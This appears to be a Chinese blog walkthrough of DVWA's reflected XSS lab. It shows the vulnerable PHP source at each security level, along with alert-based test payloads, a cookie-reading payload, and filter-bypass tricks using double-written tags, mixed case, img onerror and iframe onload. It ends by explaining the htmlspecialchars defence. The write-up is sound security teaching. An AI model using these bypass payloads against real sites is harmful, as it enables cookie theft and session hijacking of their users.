DVWA 之 XSS(Reflected)反射型XSS

最新推荐文章于 2024-07-23 10:35:31 发布
最新推荐文章于 2024-07-23 10:35:31 发布
阅读量2.1k 收藏 19
点赞数 3
分类专栏: DVWA靶场 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51683653/article/details/127198621
版权

目录

1、级别:Low

2、级别:Medium

3、级别:High

4、级别:Impossible

 

反射型XSS攻击

        又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击) 恶意代码并没有保存在目标网站,由浏览器解析脚本。

1、级别:Low

源码: 


<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

代码采用get方式传入了name参数,没有做任何的过滤与检查,存在明显的XSS漏洞。

输入一个简单的语句测试一下:

<script>alert(1)</script>

 有弹窗,即测试成功,按F12查看一下网页代码

可以看到我们在输出“Hello”之后成功注入了代码,原本这个地方应该是输入数据的,但是却变成运行代码了 ,从而达到黑客想要的目的,甚至是获取信息。

尝试一下直接获取cookie

<script>alert(document.cookie)</script>

 

2、级别:Medium


<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

 这里对输入进行了过滤,使用str_replace函数将输入中的<script>替换为空,有多种方法可以进行绕过。

双写绕过

 <sc<script>ript>alert(123)</script>

 

 大小写绕过

<Script>alert(456)</script>

 

利用其他标签进行绕过 

(1)img(图片插入法)

<img src=1 οnerrοr=alert('xss')>

(2) iframe

 <iframe οnlοad=alert(123456)>

…… 

3、级别:High


<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

preg_replace() 函数用于正则表达式的搜索和替换,这里凡是带script的都会被过滤,/i的意思是大小写通用,所以上述双写和大小写绕过都不行了,但利用其他的标签进行绕过依然可以成功。

4、级别:Impossible


<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

添加了 anti-token 防御机制,和htmlseecialchars函数来防御

htmlspecialchars()函数
htmlspecialchars函数的功能:
把预定义的字符转换为 HTML 实体。
预定义的字符是:
& (和号)成为 &
" (双引号)成为 "
' (单引号)成为 '
< (小于)成为 <
> (大于)成为 >


完美的对我们输入的内容进行过滤,避免了XSS攻击。

RexHarrr
关注
  • 3
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
DVWA下的XSS
07-25
通过对DVWA平台上的XSS攻击案例分析可以看出,无论是在反射XSS还是存储XSS中,开发者都需要采取多种措施来防止恶意代码的注入。从简单的过滤到复杂的正则表达式匹配,再到将预定义字符转换为HTML实体,每种防护...
Kali渗透测试之DVWA系列4——反射XSS(跨站脚本攻击)
浅浅的博客
05-11 3954
目录 一、XSS 1、XSS简介 2、XSS 3、漏洞形成的根源 二、反射XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
DVWA-XSS (Reflected)-反射XSS
2401_84968222的博客
05-12 931
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
dvwaXSS(reflected
ANDTM的博客
06-07 391
XSS,全称Cross Site Scripting,即跨站脚本攻击,也相当于是一种代码注入攻击,hacker在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。根据注入的恶意代码是否存储在服务器数据库中,XSS可以分为存储XSS反射XSS,还有DOMXSS由于其特殊性,常常被分为第三种。SS利用的常见用途:盗取用户cookies、劫持会话、流量劫持、网页挂马、DDOS、提升权限…
二、详解 DVWA_Reflected反射XSS
在下小黄的博客
05-23 1106
第二篇、详解 DVWA_Reflected反射XSS
DVWA】6. 反射XSS Reflected(High+Impossible)
Zichel77的博客
12-12 659
既然script标签代码被过滤,那就尝试上面用到的,使用img、body等标签的事件或者iframe等标签的src注入恶意js代码。$name变量使用的是preg_replace函数,这个函数用于正则表达式的搜索和替换了。发现回显只有一个反括号,尝试使用大小写混淆或者双写绕过,继续使用测试是否有XSS漏洞、具体和Medium的引号法相同。
[网络安全]DVWAXSS(Reflected)攻击姿势及解题详析合集
热门推荐
等风来
05-17 1万+
Payload:alert("qiu")由于str_replace() 函数将标签替换为空,且str_replace函数仅执行一次Payload将变为alert("qiu"),从而实现了正常XSS语句的注入在 PHP 中,变量名、函数名、常量名等标识符都是区分大小写的。 例如,$Qiu 和 $qiu 是两个不同的变量因此我们可构造Payload如下来绕过限制:Payload:alert("
DVWA】4. 反射XSS Reflected(Low)
Zichel77的博客
08-20 1057
用户、攻击者、被攻击的Web服务器、攻击者的Web服务器。
DVWA】5. 反射XSS Reflected(Medium)
Zichel77的博客
12-12 412
HTML语言中对引号的使用不敏感,但是有些过滤函数则对引号时锱铢必较的,因此我们可以使用不同引号来闭合XSS语句。发现就是对script标签进行了过滤,所以对script标签改写或者使用其他的标签即可。当发现过滤器仅进行一次过滤时并将一些关键字过滤为空,则可以使用双写绕过。因此就要考虑对标签进行改写从而绕过过滤机制。对输入框进行测试,看是否存在反射XSS。多出了一个touch me的点击处。,即加上引号之后能够弹窗。
DVWA 反射XSS XSS(Reflected)题解
mirocky的博客
08-04 452
DVWA靶场对反射XSS的题解,较为详细且扩展性强
网络安全原理与应用:反射XSS攻击演示.pptx
05-16
在演示中,我们通过DVWA(Damn Vulnerable Web Application)这个安全学习平台,逐步展示了不同安全级别的反射XSS攻击。 1. **初级攻击**: - 在DVWA安全级别设置为Low时,攻击者可以在输入框中输入`<script>...
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射XSS、存储XSS和DOMXSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
DVWA靶场搭建与使用
09-02
2. **跨站脚本(XSS)**:分为存储XSS反射XSS,通过注入恶意脚本,使用户在浏览页面时被执行。 3. **文件包含**:通过文件包含漏洞,可以尝试加载服务器上的任意文件,甚至执行服务器上的命令。 4. **命令注入...
记一次因敏感信息泄露而导致的越权+存储XSS
2301_80127209的博客
07-23 520
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
【WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析
xt350488的博客
07-22 1760
xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQsql注入waf绕过文章参考: https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw。
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
最新发布
亚信安全官方账号的博客
07-23 637
轻量部署,安全和业务连续性才能两不误
dvwa靶场xss反射中级
08-12
对于DVWA靶场的XSS反射中级攻击,你可以按照以下步骤进行: 1. 首先,打开DVWA靶场,并登录到应用程序中。 2. 在DVWA的导航栏中,选择"XSS (Reflected)"选项,进入XSS反射攻击页面。 3. 在输入框中尝试输入一些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值